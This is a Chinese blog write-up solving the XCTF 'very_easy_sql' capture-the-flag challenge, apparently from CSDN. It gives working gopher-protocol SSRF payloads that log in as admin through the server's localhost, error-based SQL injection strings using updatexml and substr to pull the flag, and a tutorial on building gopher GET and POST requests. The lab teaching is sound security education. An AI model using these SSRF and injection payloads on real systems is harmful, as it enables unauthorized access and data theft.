XCTF-very_easy_sql

最新推荐文章于 2024-02-28 16:23:44 发布
最新推荐文章于 2024-02-28 16:23:44 发布
阅读量370 收藏 2
点赞数 2
分类专栏: XCTF 文章标签: 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37370714/article/details/129953050
版权

XCTF-very_easy_sql

主页如下,注意有一个你不是内部用户的提示。
在这里插入图片描述
主页注释有一个user.php。

在这里插入图片描述

在这里插入图片描述
测试访问本地的127.0.0.1。
在这里插入图片描述
输入http://61.147.171.105:51039测试一下。
在这里插入图片描述
应该是过滤了某些东西,还记得首页你不是内部用户的提示么,SSRF就是用于当我们无法与内网目标直接请求通信,而可以利用web服务器来当作踏板,以web服务器的身份向内网目标交互,所以叫做server-side request forgery,服务端请求伪造。

判断web服务器是否使用的80端口。
在这里插入图片描述

随意输入信息并使用burp suite抓包,并且构造好gopher。
在这里插入图片描述
注意我们要以web服务器的身份发送,所以应该是从127.0.0.1:80请求。

gopher://127.0.0.1:80/_POST%20/%20HTTP/1.1%0d%0aHost:%20127.0.0.1:80%0d%0aContent-Type:%20application/x-www-form-urlencoded%0d%0aContent-Length:%2023%0d%0a%0d%0auname=rick&passwd=morty%0d%0a

在这里插入图片描述

我们以rick:morty的身份登录,并且获得了一个Cookie。“Set-Cookie: PHPSESSID=gq8k1gbh9sp822ur2b0hpjnbk4”,很显然我们此用户貌似不是内网已有用户。尝试一下admin:admin、admin:qwerty等几个常见的密码账户,不行就暴力跑一下。使用admin:admin,记得Content-Length记得改。

gopher://127.0.0.1:80/_POST%20/%20HTTP/1.1%0d%0aHost:%20127.0.0.1:80%0d%0aContent-Type:%20application/x-www-form-urlencoded%0d%0aContent-Length:%2024%0d%0a%0d%0auname=admin%26passwd=admin%0d%0a

在这里插入图片描述
得到了一个cookie,this_is_your_cookie=YWRtaW4%3D。

在这里插入图片描述
这个admin是啥意思?根据题目描述大概率是sql注入点。加上Cookie: this_is_your_cookie=YWRtaW4n(admin’的base64编码)
在这里插入图片描述
看报错给的反馈是admin’)。
在这里插入图片描述在这里插入图片描述

报错注入。
在这里插入图片描述

在这里插入图片描述

admin') and updatexml(1,(concat(0x7c,(select group_concat(table_name) from information_schema.tables where table_schema=database()))),1)#

在这里插入图片描述
看到有一个flag表。
在这里插入图片描述
flag表里有一个flag字段。

admin') and updatexml(1,(concat(0x7c,(select group_concat(column_name) from information_schema.columns where table_name='flag'))),1)#

在这里插入图片描述
查看flag。
在这里插入图片描述
显示不完全用substr分段读。前25个字符。

admin') and updatexml(1,(concat(0x7c,(substr((select flag from flag),1,25)))),1)#

在这里插入图片描述
后25个字符。

admin') and updatexml(1,(concat(0x7c,(substr((select flag from flag),26,50)))),1)#

在这里插入图片描述
拼接cyberpeace{73607790a96c63b371cc8015e48c9044}。我们已经完成了一次使用SSRF攻击内网的mysql服务攻击。

扩展

首先查看当前使用的curl能否支持gopher,使用curl --version。
在这里插入图片描述

gopher协议支持GET、POST请求。gopher协议格式是 gopher://host:port/_tcpStream。先模拟一个GET请求,gopher://127.0.0.1:4443/abcd,可以发现abcd只接收到了bcd,a不见了。在这里插入图片描述
因为使用gopher协议请求会吞掉第一个字符,所以用随意一个字符让它吃。
在这里插入图片描述
来用gopher get请求一下。
在这里插入图片描述
在这里插入图片描述
burp suite抓包看看请求。
在这里插入图片描述
筛选必要的请求头。
在这里插入图片描述
首先转化请求为url,并不是所有内容都要转化为url。
在这里插入图片描述
将回车换行符(\r\n)替换为%0d%0a。
在这里插入图片描述
去掉换行符。
在这里插入图片描述
这里搞忘把问号url编码了还有末尾添上%0d%0a用来表示http包请求的结束,补上。
在这里插入图片描述

为啥连接失败,因为gopher默认使用70端口,但是我们开的是80端口,修改即可。
在这里插入图片描述

在这里插入图片描述

gopher POST请求。
在这里插入图片描述
在这里插入图片描述
使用burp suite抓包后转化为POST请求。
在这里插入图片描述
在这里插入图片描述
筛选请求头,经过测试保留下来的就是必须的。
在这里插入图片描述
首先将请求转化为url编码,不是将所有内容都转化为url编码。
在这里插入图片描述

遇到回车换行符(\r\n)替换为%0d%0a,post请求数据是两个换行符。
在这里插入图片描述
接着删掉换行。
在这里插入图片描述

最后添加上gopher://127.0.0.1/_就可以了。
在这里插入图片描述

这样我们就完成了一次gopher的POST请求。

在这里插入图片描述

小总结一下使用gopher请求GET和POST的注意事项:

  • GET和POST最好都在末尾添加上%0d%0a表示http包请求结束
  • GET别忘问号编码
  • POST别忘%0d%0a替换回车换行
永远是深夜有多好。
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF-HW-pipeline附件
11-09
附件
简易SQL----Easy
09-07
简单化SQL增删改查,支持Access数据库。 可复制粘贴字段,方便写SQL语句。
攻防世界-very-easy-sql
最新发布
chinese_cabbage0的博客
02-28 1716
攻防世界的这个题目的详细解析,没有比这个更加全面,更加通俗易懂的了,大家可以参考一下,学生到很多东西
XCTF-Mobile】新手练习区-01-easy-apk.apk
08-04
题目:https://adworld.xctf.org.cn/task/task_list?type=mobile&number=6&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/easyapk
XCTF_very_easy_sql
Q_U_A_R_T_E_R的博客
07-30 563
【代码】XCTF_very_easy_sql
攻防世界 -- very_easy_sql
weixin_48031371的博客
09-14 7323
攻防世界 -- very_easy_sql
Web安全攻防世界08 very_easy_sql
weixin_42789937的博客
12-25 3074
Web安全攻防世界08 very_easy_sql,我也有点稀里糊涂,经过了多次失败,终于水了一篇混杂了30%的博文链接+60%的错误解法+文末10%官网wp的博文~
xctf之very_easy_sql
qq_40646572的博客
10-11 2532
题目如上,既然这道题的名称就是sql,那么就是让我们找到sql注入点。题目下面介绍说是签到题,我信了,然后我人麻了。。。我以为签到题可能就是注入点直接给我们了,然而并不是,这是一道较为复杂的题,起码对我来说是的。这道题包含gopher协议结合ssrf漏洞的sql注入。首先,在页面上有两个输入框,进行尝试了下,发现不是注入点,然后我们看到请求返回包中,存在use.php提示,并且(后面我们发现此处存在一个大坑。)
攻防世界web新手 - very_easy_sql(非常详细的wp)
yuanxu8877的博客
11-27 6706
攻防世界web新手 - very_easy_sql(非常详细的wp),希望大家不要吝啬您的点赞收藏哦。
【愚公系列】2023年05月 攻防世界-Web(very_easy_sql
时光隧道
05-27 7785
SSRF(Server Side Request Forgery)是一种安全漏洞,攻击者可以利用该漏洞远程发送请求,使得目标服务器处理攻击者指定的请求,而不是合法的请求。攻击者可以利用此漏洞,访问受保护的资源,或者从外部网络中执行任意命令。Gopher协议是一种用于访问互联网资源的协议,通过gopher协议可以访问各种不同类型的协议,包括http、ftp、SMTP等。攻击者可以利用gopher协议来构造恶意请求,从而利用SSRF漏洞攻击目标系统。
web:very_easy_sqlsql、ssrf、gopher协议sql注入)
sleepywin的博客
12-02 401
通过报错信息,可以找到闭合点,有报错信息,直接使用报错注入。数据库信息被回显出来了,报错信息可以使用,按正常的步骤走。联系之前原始页面写的“不是内网用户,无法别识身份”构造payload,检查是否可以进行报错注入。解码结果为admin,cookie为注入点。随便输入了一个,发现url有参数显示。把这个set-cookie解码出来为。试一下靶机的网址,返回nonono。查到flag表里只有一个flag列。查看源码,找到一个use.php。显示不是内部用户,无法识别信息。用bp抓包修改信息后,显示如下。
XCTF-Mobile】新手练习区-02-easy-dex.apk
08-16
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5089&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/easydex
XCTF-Mobile】新手练习区-04-easyjava.apk
08-04
题目:https://adworld.xctf.org.cn/task/task_list?type=mobile&number=6&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/easyjava
xctf.rar_HTML5自适应
09-19
实现html5全屏滚动效果的源码,全屏平滑滚动,自适应浏览器
【攻防世界】Web very_easy_sql
DG_s1mple
12-31 1696
时间盲注 和 Bool 盲注很像,区别就是 “参照物” 的不同,Bool 盲注是通过页面的一些变化来进行判断结果,但是有时候,执行一些 sql 语句的测试,页面不会有像布尔盲注那样直观的变化,这个时候可以在布尔盲注的基础上结合 if 判断和 sleep() 函数来得到一个时间上的延迟参照,也就可以让我们进行一些判断。当你在index.php登录admin,admin的时候,是不会登录成功的,只能在use.php用ssrf去登录,因为它需要在内部登录。很幸运的是,好像登录上去了,这一串解码出来是admin。
攻防世界--very_easy_sql
08-26 5906
页面显示"you are not an inner user, so we can not let you have identify~",就是说只能内部访问登录。这里抓包还看到返回包里有个set-cookie。注入点在cookie,通过使用时间盲注payload然后再base64转码,编写盲注脚本。构造ssrf语句实现从内部访问。...
[CTF/网络安全] 攻防世界 very_easy_sql 解题详析(gopher协议+ssrf漏洞sql注入+盲注脚本)
等风来
08-01 7496
登录处直接注入会提示you are not an inner user, so we can not let you have identify~查看源代码发现use.php,访问后猜测该题为基于ssrf漏洞的sql注入:因此我们可构造含有gopher协议的盲注脚本,通过对use.php界面发送请求来获取flag。具体实现的方法是通过构造不同的poc来进行注入攻击,并利用时间延迟判断是否成功注入。
[攻防世界]very_easy_sql
GKD2019的博客
01-24 869
# [攻防世界]very_easy_sql 参考链接:https://blog.csdn.net/yuanxu8877/article/details/128069145 ### 0x00 前置知识 - ssrf + gopher协议 - sql注入(报错注入or时间盲注) - python脚本编写 ssrf可以利用协议作为探针访问内网,如http,file,dict,ftp,gopher等 ## gopher协议和ssrf联合使用 > gopher协议是一种信息查找系统,他将Inter
pure_color xctf
07-16
pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值